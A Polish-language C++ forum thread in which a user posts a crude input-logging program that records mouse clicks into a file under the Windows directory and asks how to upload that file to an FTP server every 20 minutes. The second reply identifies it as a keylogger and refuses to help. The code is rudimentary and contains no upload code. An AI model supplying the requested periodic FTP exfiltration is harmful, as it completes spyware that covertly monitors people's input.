Problem z wysyłaniem pliku na ftp c++


(Mario99228) #1

Chciałbym by zapisany plik wysyłał się na ftp. W którym miejscu wklepać kod za to odpowiedzialny? tak żeby plik się wysyłał co 20 minut. jak wstawiam w petli to żadne dane nie SA wysyłane sam plik. Jesli wstawie poza pętla to nic nie jest wysłane. programuje w devc++

#include 

#include 

#include

#include 

#include 


using namespace std;int main(){

string log;


while(true){   if(GetAsyncKeyState(0x01)){

      cout<<"Prawy klawisz myszki\n";

      log+="Prawy klawisz myszki\n";

        Sleep(240) ;   

   };  ofstream myfilee;


myfilee.open ("c:\\windows\\kliki.txt");

myfilee << log ;

myfilee.close();


}

}

(Kacper B Zuk) #2

Po co Ci to? W keyloggerze nikt Ci raczej nie pomoże.